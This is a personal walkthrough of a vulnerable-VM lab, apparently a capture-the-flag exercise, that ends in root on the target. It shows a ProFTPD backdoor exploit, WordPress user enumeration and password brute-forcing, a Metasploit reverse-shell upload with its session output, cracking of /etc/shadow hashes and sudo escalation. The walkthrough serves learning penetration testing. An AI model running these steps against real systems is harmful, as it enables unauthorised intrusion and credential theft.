First of all, I Downloaded the image and booted it up. I already had Kali Virt up to date and running. Network adapter on both of the Virt’s set to Bridge Adapter. Due to this I am not going to note/list IP discovery scans.
Ubuntu Host machine IP discovered: 172.30.124.91
Kali machine IP: 172.30.124.98
The Goal: “Your goal is to remotely attack the VM and gain root privileges.”
The results from the scan show 3 possible attack vectors. SSH on port 22, FTP on port 21 and HTTP on Port 80.
A quick google of ProFTPD 1.3.3c exploit and I can see several links. First of which was a Rapid7 page. (https://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_133c_backdoor). Let’s give it a go and see what happens.
Bingo, we have root access to the box. Pretty simple and straight forward exploit. Let’s see if there are any other exploits that we can take advantage of.
Browsed to 172.30.124.91:80 via Firefox
Let’s have a look at the source –
” Viewed source page:
<p>This is the default web page for this server.</p>
<p>The web server software is running but no content has been added, yet.</p>
Not really much going on there so I decided to try and enumerate the site using OWASP ZAP with forced browse option. Which has found http://172.30.124.91/secrets and this appears to have wp-admin portal.
The source of http://172.30.124.91/secret appears to have the hostname of vtcsec.
I have updated the hostfile on the attacking machine to point the hostname to the IP of the target machine.
Browsed to the WordPress login page http://vtcsec/secret/wp-login.php?redirect_to=http%3A%2F%2Fvtcsec%2Fsecret%2Fwp-admin%2F&reauth=1. At this point, I was not really sure what my next steps could/should be so spent a bit of time doing some research which pointed me in the direction of WPscan (https://wpscan.org/).
wpscan –url http://vtcsec/secret/ came back with the following results:
Looking at the results it has flagged and linked us to a couple of possible attack vectors. Wpscan also has the ability to enumerate user names, so I thought I would give this a go.
wpscan –url http://vtcsec/secret/ –enumerate u
Perfect this has found a user account with the name admin. WPscan also has the ability to brute-force the login page with a wordlist. After a couple of invalid commands, I was able to kick off a brute-force attempt using the rockyou.txt wordlist that comes with Kali.
wpscan –url http://vtcsec/secret/ –passwords /usr/share/wordlists/rockyou.txt -U admin
Valid Combination found – Username: admin Password: admin. Time to give them a try, we are in!
Now we have access it is time to do a little research into what we can from here to gain access to the server.
So, after doing a fair amount of googling I discovered that there are a couple of possibilities which include uploading a fake theme or plugin with reverse shell within php files. I found the following guide (https://rstforums.com/forum/topic/108627-how-to-create-a-fake-wordpress-plugintheme-for-reverse-shell/). I ran through this and was able to get a shell connection. This seemed to break access to the site for me though, most likely something I was doing wrong. After tinkering around and removing the plugin and rebooting the Ubuntu box I was able to access the WP dashboard again. Thinking real world scenario this could potentially kill the Pentest as it disrupted the site. I shall revisit and try to figure out where I went wrong at a later date.
I decided to look at the Metasploit route that I had also read up about. Metasploit has an exploit built in called wp_admin_shell_upload and a payload called reverse_tcp, hopefully we can use these to get a shell. I had also read that Kali has a privilege escalation script that searches for vulnerabilities and misconfigurations, this is located /usr/bin/unix-privesc-check (https://github.com/pentestmonkey/unix-privesc-check). I plan to upload and run this script if I am able to get shell access.
Started Metasploit and run the following
Done the following to set options.
set PASSWORD admin
set RHOSTS vtcsec
set TARGETURI /secret
set USERNAME admin
set LHOST 172.30.124.98 (attacker machine)
Options now look like this.
msf5 exploit(unix/webapp/wp_admin_shell_upload) > exploit
[*] Started reverse TCP handler on 172.30.124.98:4444
[*] Authenticating with WordPress using admin:admin…
[+] Authenticated with WordPress
[*] Preparing payload…
[*] Uploading payload…
[*] Executing the payload at /secret/wp-content/plugins/dXfJcBYvbV/cPOhghZWYT.php…
[*] Sending stage (38247 bytes) to 172.30.124.91
[*] Meterpreter session 1 opened (172.30.124.98:4444 -> 172.30.124.91:40198) at 2019-03-06 12:01:48 +0000
[!] Tried to delete cPOhghZWYT.php, unknown result
[!] Tried to delete dXfJcBYvbV.php, unknown result
[!] Tried to delete ../dXfJcBYvbV, unknown result
To confirm that we are connected use the getuid command.
Attempted to upload the unix-privesc-check script but got the following error:
Turns out I was just being an idiot and needed to name the file!
Chucked in shell command to jump into shell. Checked the user again using whoami command this time. Then change directory to /tmp. made unix-privesc-check executable by doing chmond +x unix-privesc-check and then ran the script ./unix-privesc-check standard. Time to analyse the results.
The check has flagged that the /etc/passwd file is read/writable for everyone. I wanted to confirm that I could read this by using cat command – cat /etc/passwd.
At the very least we have a list of users that we can take a look at. Although the script didn’t flag anything with the /etc/shadow file I wanted to check and see if we had read access to it, cat /etc/shadow.
Yes we do, and it looks like we have a hash for user marlinspike. From some previous googling that I had done I stumbled into this site (https://null-byte.wonderhowto.com/how-to/crack-shadow-hashes-after-getting-root-linux-system-0186386/) which I thought I may be able to use. So let’s run through it and see what happens.
Scrolled back up in the terminal simply copied and pasted the content of both passwd and shadow to the desktop of the kali machine into separate files called passwd and shadow. I then run the following command unshadow /root/Desktop/passwd /root/Desktop/shadow > /root/Desktop/passwords.txt. Once the new file was generated on the desktop I chucked this at John the Ripper without any wordlist or flags.
Just like the WordPress admin account it appears the username and password are the same. Username: marlinspike Password: marlinspike. See if we can ssh.
ssh [email protected] after a spat of fat fingeritus I was in.
First things first let’s use the history command to see what commands have been used. 186 previous commands have been used in the marlinspike account. Although I can’t see any root login details in plain text I can see this user has ran commands using sudo which elevates his permission. Having a quick look at what groups the account marlinspike is a member of confirms that it is a member of sudo.
A quick look at the sudoers file can confirm exactly what this gives us permission to.
sudo -i and Voilà [email protected]
From here I am fairly sure I could look at ssh keys and doing something with them. There is likely to be a couple of other exploits maybe easier ones to than I have muddled my way through doing. For now, I am going to have a break from this one and possibly look at other people’s walkthroughs to get an idea of what I have missed.